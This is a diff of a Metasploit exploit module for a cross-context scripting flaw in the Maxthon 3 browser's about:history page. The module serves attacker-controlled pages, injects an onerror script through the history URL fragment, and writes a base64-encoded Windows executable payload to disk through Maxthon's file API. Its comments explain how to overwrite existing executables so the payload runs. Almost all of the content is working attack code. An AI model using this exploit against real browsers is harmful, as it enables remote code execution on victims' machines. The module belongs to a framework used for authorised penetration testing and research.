1+ ##
2+ # This file is part of the Metasploit Framework and may be subject to
3+ # redistribution and commercial restrictions. Please see the Metasploit
4+ # Framework web site for more information on licensing and terms of use.
5+ # http://metasploit.com/framework/
6+ ##
7+
8+
19require 'msf/core'
210
311class Metasploit3 < Msf ::Exploit ::Remote
@@ -7,33 +15,29 @@ class Metasploit3 < Msf::Exploit::Remote
715
816 def initialize ( info = { } )
917 super ( update_info ( info ,
10- 'Name' => 'Maxthon about:history XCS' ,
18+ 'Name' => 'Maxthon3 about:history XCS' ,
1119 'Description' => %q{
1220 Cross Context Scripting (XCS) is possible in the Maxthon about:history page.
13- Injection in such privileged/trusted browser zone can be used to modify configuration settings and
14- execute arbitrary commands. Affects Maxthon 3 browsers .
21+ Injection in such privileged/trusted browser zone can be used to modify
22+ configuration settings and execute arbitrary commands .
1523 } ,
1624 'License' => BSD_LICENSE ,
1725 'Author' =>
18- [ 'Roberto Suggi Liverani' , # Discovered the vulnerability and developed msf module
19- ] ,
20- 'Version' => '$Revision: 1 $' ,
26+ [
27+ 'Roberto Suggi Liverani' , # Discovered the vulnerability and developed msf module
28+ ] ,
2129 'References' =>
2230 [
23- [ 'CVE' , 'TBA' ] ,
2431 [ 'URL' , 'http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html' ] ,
2532 ] ,
2633 'Payload' =>
2734 {
2835 'DisableNops' => true ,
2936 } ,
37+ 'Platform' => 'win' ,
3038 'Targets' =>
3139 [
32- [ 'Maxthon 3' ,
33- {
34- 'Platform' => 'win' ,
35- }
36- ] ,
40+ [ 'Maxthon 3 on Windows' , { } ]
3741 ] ,
3842 'DisclosureDate' => 'Nov 26 2012' ,
3943 'DefaultTarget' => 0
@@ -67,7 +71,7 @@ def on_request_uri(cli, request)
6771 ^
6872
6973 case request . uri
70- when /[?] jspayload/
74+ when /\? jspayload/
7175 p = regenerate_payload ( cli )
7276 if ( p . nil? )
7377 send_not_found ( cli )
@@ -77,16 +81,24 @@ def on_request_uri(cli, request)
7781 # everything is encoded
7882 penc = Msf ::Util ::EXE . to_win32pe ( framework , p . encoded )
7983 penc2 = Rex ::Text . encode_base64 ( penc )
84+
8085 # now this is base64 encoded payload which needs to be passed to the file write api in maxthon
8186 # depending on maxthon version, then file can be launched via Program DOM API
8287 # or replacing Java program
88+ # here we need to take a dirty approach, we need to overwrite an existing exe and then invoke it
89+ # this is because the maxthon.program object has been silently removed in latest Maxthon versions...
90+ # in WindowsXP, any exe can be overwritten, then a simple call to a uri scheme can invoke the exe
91+ # e.g. wab.exe invoked via mailto://
92+ # however, in win7, a prompt will be displayed if browser executes a mail client or an external program
93+ # so a common way to exploit would be to overwrite the j2plauncher.exe, which calls java.exe when applet is found
94+ # once that is done, then we can point to a page where a java applet exists which will invoke java.exe,
95+ # unless previously loaded by the user
8396 content =
8497 %Q{
8598 var fileTemp = new maxthon.io.File.createTempFile("test","exe");
8699 var fileObj = maxthon.io.File(fileTemp);
87100 maxthon.io.FileWriter(fileTemp);
88101
89-
90102 if(maxthon.program)
91103 {
92104 maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{ penc2 }
@@ -95,15 +107,6 @@ def on_request_uri(cli, request)
95107
96108 else
97109 {
98- // here we need to take a dirty approach, we need to overwrite an existing exe and then invoke it
99- // this is because the maxthon.program object has been silently removed in latest Maxthon versions...
100- // in WindowsXP, any exe can be overwritten, then a simple call to a uri scheme can invoke the exe
101- // e.g. wab.exe invoked via mailto://
102- // however, in win7, a prompt will be displayed if browser executes a mail client or an external program
103- // so a common way to exploit would be to overwrite the j2plauncher.exe, which calls java.exe when applet is found
104- // once that is done, then we can point to a page where a java applet exists which will invoke java.exe,
105- // unless previously loaded by the user
106- //
107110 fileTemp.name_ = "#{ jpath }
108111 maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{ penc2 }
109112
@@ -115,45 +118,39 @@ def on_request_uri(cli, request)
115118
116119 }
117120
118- when /[?] history/
119- js = %Q^
121+ when /\? history/
122+ js = %Q|
120123 window.onload = function() {
121124 location.href = "about:history";
122125 }
123- ^
124- content = %Q^
126+ |
127+
128+ content = %Q|
125129 #{ html_hdr }
126130 <script>
127131 #{ js }
128132 </script>
129133 #{ html_ftr }
130- ^
134+ |
131135 when get_resource ( )
132136 print_status ( "Sending #{ self . name } #{ request . uri } )
133137
134- js = %Q^
138+ js = %Q|
135139
136140 url = location.href;
137141 url2 = url + "?jspayload=1";
138-
139142 inj = "?history#%22/><img src=a onerror=%22"
140-
141143 inj_1 = "a=document.createElement('script');a.setAttribute('src','"+url2+"');document.body.appendChild(a);";
142-
143-
144144 window.location = unescape(inj) + inj_1;
145+ |
145146
146-
147-
148-
149- ^
150- content = %Q^
147+ content = %Q|
151148 #{ html_hdr }
152149 <script>
153150 #{ js }
154151 </script>
155152 #{ html_ftr }
156- ^
153+ |
157154 else
158155 print_status ( "Sending 404 for request #{ request . uri } )
159156 send_not_found ( cli )
0 commit comments